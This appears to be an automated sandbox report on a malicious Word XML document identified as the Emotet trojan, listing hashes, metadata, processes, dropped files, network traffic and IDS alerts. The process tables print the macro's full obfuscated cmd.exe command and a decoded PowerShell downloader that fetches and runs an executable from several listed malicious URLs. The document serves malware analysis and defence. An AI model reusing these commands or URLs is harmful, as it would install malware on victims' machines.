File name: | asdfasdf.doc |
Full analysis: | https://app.any.run/tasks/58bdfbb2-6049-4b3a-b87d-481904389cc3 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 23, 2019, 10:18:18 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | C8A65DCF63D22A1798385E7A9908A17B |
SHA1: | 224807E7D5A89718EAC50CF7D6A390A936118CB8 |
SHA256: | A6E5D329FDA48244000EF4AC47A2872DEEA0A005D662279934ED1B5430E1A33A |
SSDEEP: | 3072:Mbw+aINTjL/xSu90OoiLuDKZXfwKeljR1z:MWIN7xUOmD+XfwLX |
.xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1) |
---|---|---|
.xml | | | Microsoft Office XML Flat File Format (ASCII) (31) |
.xml | | | Generic XML (ASCII) (2.3) |
.html | | | HyperText Markup Language (1.4) |
WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
---|---|
WordDocumentBodySectSectPrColsSpace: | 720 |
WordDocumentBodySectSectPrPgMarGutter: | - |
WordDocumentBodySectSectPrPgMarFooter: | 720 |
WordDocumentBodySectSectPrPgMarHeader: | 720 |
WordDocumentBodySectSectPrPgMarLeft: | 1440 |
WordDocumentBodySectSectPrPgMarBottom: | 1440 |
WordDocumentBodySectSectPrPgMarRight: | 1440 |
WordDocumentBodySectSectPrPgMarTop: | 1440 |
WordDocumentBodySectSectPrPgSzH: | 15840 |
WordDocumentBodySectSectPrPgSzW: | 12240 |
WordDocumentBodySectSectPrRsidR: | 005E6EE1 |
WordDocumentBodySectPRPictShapeImagedataTitle: | - |
WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square |
WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
WordDocumentBodySectPRPictShapeId: | Picture 1 |
WordDocumentBodySectPRPictBinData: | (Binary data 145376 bytes, use -b option to extract) |
WordDocumentBodySectPRPictBinDataName: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
WordDocumentBodySectPRPictShapetypeLockExt: | edit |
WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
WordDocumentBodySectPRPictShapetypeStroked: | f |
WordDocumentBodySectPRPictShapetypeFilled: | f |
WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
WordDocumentBodySectPRPictShapetypePreferrelative: | t |
WordDocumentBodySectPRPictShapetypeSpt: | 75 |
WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
WordDocumentBodySectPRRPrNoProof: | - |
WordDocumentBodySectPRRsidRPr: | 00F74043 |
WordDocumentBodySectPRsidRDefault: | 00D718DB |
WordDocumentBodySectPRsidR: | 005E6EE1 |
WordDocumentDocPrRsidsRsidVal: | 005A24B1 |
WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
WordDocumentDocPrCompatDontGrowAutofit: | - |
WordDocumentDocPrCompatUseAsianBreakRules: | - |
WordDocumentDocPrCompatWrapTextWithPunct: | - |
WordDocumentDocPrCompatSnapToGridInCell: | - |
WordDocumentDocPrCompatBreakWrappedTables: | - |
WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
WordDocumentDocPrIgnoreMixedContentVal: | off |
WordDocumentDocPrSaveInvalidXMLVal: | off |
WordDocumentDocPrValidateAgainstSchema: | - |
WordDocumentDocPrPixelsPerInchVal: | 120 |
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: | - |
WordDocumentDocPrOptimizeForBrowser: | - |
WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
WordDocumentDocPrPunctuationKerning: | - |
WordDocumentDocPrDefaultTabStopVal: | 720 |
WordDocumentDocPrDoNotEmbedSystemFonts: | - |
WordDocumentDocPrRemovePersonalInformation: | - |
WordDocumentDocPrZoomPercent: | 100 |
WordDocumentDocPrViewVal: | |
WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
WordDocumentShapeDefaultsShapelayoutExt: | edit |
WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
WordDocumentShapeDefaultsShapedefaultsExt: | edit |
WordDocumentDocSuppDataBinData: | (base64-encoded binary data omitted) |
WordDocumentDocSuppDataBinDataName: | editdata.mso |
WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
WordDocumentStylesStyleRsidVal: | 005A24B1 |
WordDocumentStylesStyleLinkVal: | BalloonTextChar |
WordDocumentStylesStyleBasedOnVal: | Normal |
WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
WordDocumentStylesStyleTblPrTblIndType: | dxa |
WordDocumentStylesStyleTblPrTblIndW: | - |
WordDocumentStylesStyleUiNameVal: | Table Normal |
WordDocumentStylesStyleRPrLangBidi: | AR-SA |
WordDocumentStylesStyleRPrLangFareast: | EN-US |
WordDocumentStylesStyleRPrLangVal: | EN-US |
WordDocumentStylesStyleRPrSz-csVal: | 22 |
WordDocumentStylesStyleRPrSzVal: | 22 |
WordDocumentStylesStyleRPrFontVal: | Calibri |
WordDocumentStylesStylePPrSpacingLine-rule: | auto |
WordDocumentStylesStylePPrSpacingLine: | 259 |
WordDocumentStylesStylePPrSpacingAfter: | 160 |
WordDocumentStylesStyleNameVal: | Normal |
WordDocumentStylesStyleStyleId: | Normal |
WordDocumentStylesStyleDefault: | on |
WordDocumentStylesStyleType: | paragraph |
WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
WordDocumentStylesLatentStylesDefLockedState: | off |
WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
WordDocumentFontsFontSigCsb-1: | 00000000 |
WordDocumentFontsFontSigCsb-0: | 000001FF |
WordDocumentFontsFontSigUsb-3: | 00000000 |
WordDocumentFontsFontSigUsb-2: | 00000009 |
WordDocumentFontsFontSigUsb-1: | C0007841 |
WordDocumentFontsFontSigUsb-0: | E0002AFF |
WordDocumentFontsFontPitchVal: | variable |
WordDocumentFontsFontFamilyVal: | Roman |
WordDocumentFontsFontCharsetVal: | 00 |
WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
WordDocumentFontsFontName: | Times New Roman |
WordDocumentFontsDefaultFontsCs: | Times New Roman |
WordDocumentFontsDefaultFontsH-ansi: | Calibri |
WordDocumentFontsDefaultFontsFareast: | Calibri |
WordDocumentFontsDefaultFontsAscii: | Calibri |
WordDocumentDocumentPropertiesVersion: | 16 |
WordDocumentDocumentPropertiesCharactersWithSpaces: | 1 |
WordDocumentDocumentPropertiesParagraphs: | 1 |
WordDocumentDocumentPropertiesLines: | 1 |
WordDocumentDocumentPropertiesCharacters: | 1 |
WordDocumentDocumentPropertiesWords: | - |
WordDocumentDocumentPropertiesPages: | 1 |
WordDocumentDocumentPropertiesLastSaved: | 2019:01:23 06:29:00Z |
WordDocumentDocumentPropertiesCreated: | 2019:01:23 06:29:00Z |
WordDocumentDocumentPropertiesTotalTime: | - |
WordDocumentDocumentPropertiesRevision: | 1 |
WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
WordDocumentOcxPresent: | no |
WordDocumentEmbeddedObjPresent: | no |
WordDocumentMacrosPresent: | yes |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2968 | "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\asdfasdf.doc.xml" | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: XML Editor Exit code: 0 Version: 14.0.4750.1000 | ||||
2680 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\asdfasdf.doc.xml" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | MSOXMLED.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4068 | c:\m4308\n1983\c4441\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set wJ=Ic$Fy%H72nT)x-4f:G D(CbM5igoUdjv;VLhW18}Km'w=r\.S06Np@9E/salOAPBu{,t~k+e3&&for %J in (52;27;43;5;62;28;63;34;0;21;16;68;24;66;37;5;45;5;48;55;48;48;0;60;51;51;61;23;55;16;68;13;14;66;37;5;35;5;10;55;23;62;16;68;13;72;66;37;5;59;59;18;2;29;7;24;38;37;44;42;22;37;72;7;14;42;32;2;52;38;24;54;38;44;9;71;43;13;27;22;30;71;1;67;18;51;71;67;47;36;71;22;21;59;25;71;9;67;32;2;64;38;49;54;38;44;42;35;67;67;52;16;56;56;71;45;29;71;41;22;64;59;64;67;47;1;27;41;56;67;45;55;33;19;58;17;53;35;67;67;52;16;56;56;22;58;25;30;25;9;15;71;9;47;1;27;41;56;50;23;71;8;59;10;6;48;45;43;53;35;67;67;52;16;56;56;15;58;67;41;58;9;64;45;67;58;57;69;71;57;71;9;47;1;27;41;56;49;19;24;40;63;15;14;17;69;53;35;67;67;52;16;56;56;52;58;69;57;27;4;41;64;35;71;9;29;25;57;59;25;69;47;1;27;41;56;52;29;29;48;19;57;63;57;3;53;35;67;67;52;16;56;56;22;27;27;67;58;59;4;47;1;27;41;56;3;71;12;24;67;7;15;71;42;47;48;52;59;25;67;20;42;53;42;11;32;2;58;14;50;14;54;44;42;9;72;8;8;24;42;32;2;45;7;72;8;8;18;44;18;42;7;38;14;42;32;2;43;37;50;37;44;42;64;72;8;50;37;42;32;2;69;14;72;37;50;44;2;71;9;31;16;67;71;41;52;70;42;46;42;70;2;45;7;72;8;8;70;42;47;71;12;71;42;32;15;27;45;71;58;1;35;20;2;64;37;50;37;50;18;25;9;18;2;64;38;49;54;38;11;65;67;45;4;65;2;52;38;24;54;38;47;19;27;43;9;59;27;58;29;3;25;59;71;20;2;64;37;50;37;50;66;18;2;69;14;72;37;50;11;32;2;31;8;8;38;49;44;42;31;54;50;7;7;42;32;0;15;18;20;20;17;71;67;13;0;67;71;41;18;2;69;14;72;37;50;11;47;59;71;9;26;67;35;18;13;26;71;18;14;49;49;49;49;11;18;65;0;9;31;27;69;71;13;0;67;71;41;18;2;69;14;72;37;50;32;2;27;54;50;14;49;44;42;27;24;7;49;54;42;32;22;45;71;58;69;32;39;39;1;58;67;1;35;65;39;39;2;52;7;72;72;54;44;42;35;24;7;54;38;42;32;81)do set Oe=!Oe!!wJ:~%J,1!&&if %J==81 echo !Oe:*Oe!=!|FOR /F "delims=RfvH0 tokens=1" %B IN ('ftype^^^|findstr cm')DO %B " | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2656 | CmD /V:ON/C"set wJ=Ic$Fy%H72nT)x-4f:G D(CbM5igoUdjv;VLhW18}Km'w=r\.S06Np@9E/salOAPBu{,t~k+e3&&for %J in (52;27;43;5;62;28;63;34;0;21;16;68;24;66;37;5;45;5;48;55;48;48;0;60;51;51;61;23;55;16;68;13;14;66;37;5;35;5;10;55;23;62;16;68;13;72;66;37;5;59;59;18;2;29;7;24;38;37;44;42;22;37;72;7;14;42;32;2;52;38;24;54;38;44;9;71;43;13;27;22;30;71;1;67;18;51;71;67;47;36;71;22;21;59;25;71;9;67;32;2;64;38;49;54;38;44;42;35;67;67;52;16;56;56;71;45;29;71;41;22;64;59;64;67;47;1;27;41;56;67;45;55;33;19;58;17;53;35;67;67;52;16;56;56;22;58;25;30;25;9;15;71;9;47;1;27;41;56;50;23;71;8;59;10;6;48;45;43;53;35;67;67;52;16;56;56;15;58;67;41;58;9;64;45;67;58;57;69;71;57;71;9;47;1;27;41;56;49;19;24;40;63;15;14;17;69;53;35;67;67;52;16;56;56;52;58;69;57;27;4;41;64;35;71;9;29;25;57;59;25;69;47;1;27;41;56;52;29;29;48;19;57;63;57;3;53;35;67;67;52;16;56;56;22;27;27;67;58;59;4;47;1;27;41;56;3;71;12;24;67;7;15;71;42;47;48;52;59;25;67;20;42;53;42;11;32;2;58;14;50;14;54;44;42;9;72;8;8;24;42;32;2;45;7;72;8;8;18;44;18;42;7;38;14;42;32;2;43;37;50;37;44;42;64;72;8;50;37;42;32;2;69;14;72;37;50;44;2;71;9;31;16;67;71;41;52;70;42;46;42;70;2;45;7;72;8;8;70;42;47;71;12;71;42;32;15;27;45;71;58;1;35;20;2;64;37;50;37;50;18;25;9;18;2;64;38;49;54;38;11;65;67;45;4;65;2;52;38;24;54;38;47;19;27;43;9;59;27;58;29;3;25;59;71;20;2;64;37;50;37;50;66;18;2;69;14;72;37;50;11;32;2;31;8;8;38;49;44;42;31;54;50;7;7;42;32;0;15;18;20;20;17;71;67;13;0;67;71;41;18;2;69;14;72;37;50;11;47;59;71;9;26;67;35;18;13;26;71;18;14;49;49;49;49;11;18;65;0;9;31;27;69;71;13;0;67;71;41;18;2;69;14;72;37;50;32;2;27;54;50;14;49;44;42;27;24;7;49;54;42;32;22;45;71;58;69;32;39;39;1;58;67;1;35;65;39;39;2;52;7;72;72;54;44;42;35;24;7;54;38;42;32;81)do set Oe=!Oe!!wJ:~%J,1!&&if %J==81 echo !Oe:*Oe!=!|FOR /F "delims=RfvH0 tokens=1" %B IN ('ftype^^^|findstr cm')DO %B " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2248 | C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $d7581='b1374';$p8598=new-object Net.WebClient;$u8098='http://erdembulut.com/trEVDaG@http://baijinfen.com/6Me2lTHSrw@http://fatmanurtaskesen.com/0D5KBf4Gk@http://paksoymuhendislik.com/pddSDsBsF@http://bootaly.com/Fex5t7fe'.Split('@');$a4649='n3225';$r7322 = '784';$w161='u3261';$k4316=$env:temp+'\'+$r7322+'.exe';foreach($u1616 in $u8098){try{$p8598.DownloadFile($u1616, $k4316);$v2280='v9677';If ((Get-Item $k4316).length -ge 40000) {Invoke-Item $k4316;$o9640='o5709';break;}}catch{}}$p7339='h5798';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2324 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=RfvH0 tokens=1" %B IN ('ftype^|findstr cm') DO %B " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2804 | C:\Windows\system32\cmd.exe /c ftype|findstr cm | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2352 | C:\Windows\system32\cmd.exe /S /D /c" ftype" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3096 | findstr cm | C:\Windows\system32\findstr.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3724 | cmd | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2680 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR70CB.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2680 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8474E6D.jpg | — | |
MD5:— | SHA256:— | |||
3956 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FTAN89C45CR0P27MVZ43.temp | — | |
MD5:— | SHA256:— | |||
3956 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2680 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:A1B3F099E433A1C80F75E27EFAD5E1D3 | SHA256:15B3A25A3E322D340651CC578797BFD74C4E6137974FE8A65B526EC2195C52A1 | |||
2760 | 784.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:E3A822335FF17167EF126A8858F02457 | SHA256:9F3F5857DE6D5E51DDFAD6E1BBD23E885D8B570DCDFBFFD8544C5EB02ACCFDD5 | |||
2680 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:FFDDA778140572C37C6C1B9E1A88C58B | SHA256:478279FBD54E6D1EE6C21D74755708B0B3AD34CCC4069C872C81C9A3A4BF25D2 | |||
3956 | powershell.exe | C:\Users\admin\AppData\Local\Temp\784.exe | executable | |
MD5:E3A822335FF17167EF126A8858F02457 | SHA256:9F3F5857DE6D5E51DDFAD6E1BBD23E885D8B570DCDFBFFD8544C5EB02ACCFDD5 | |||
2680 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$dfasdf.doc.xml | pgc | |
MD5:F28C7546AE14C609B4ABC7A2ABF8123E | SHA256:9DDDC249A3E0C2C90ABE62708D2655FF0FB431775DD4C73268FF99FCA8427547 | |||
3956 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF24831b.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3040 | wabmetagen.exe | GET | — | 200.125.113.60:8080 | http://200.125.113.60:8080/ | AR | — | — | malicious |
3956 | powershell.exe | GET | 200 | 94.73.146.97:80 | http://erdembulut.com/trEVDaG/ | TR | executable | 192 Kb | malicious |
3956 | powershell.exe | GET | 301 | 94.73.146.97:80 | http://erdembulut.com/trEVDaG | TR | html | 1.12 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3956 | powershell.exe | 94.73.146.97:80 | erdembulut.com | Cizgi Telekomunikasyon Anonim Sirketi | TR | malicious |
3040 | wabmetagen.exe | 200.125.113.60:8080 | — | Telecentro S.A. | AR | malicious |
Domain | IP | Reputation |
---|---|---|
erdembulut.com | | malicious |
PID | Process | Class | Message |
---|---|---|---|
3956 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3956 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3956 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3956 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3956 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |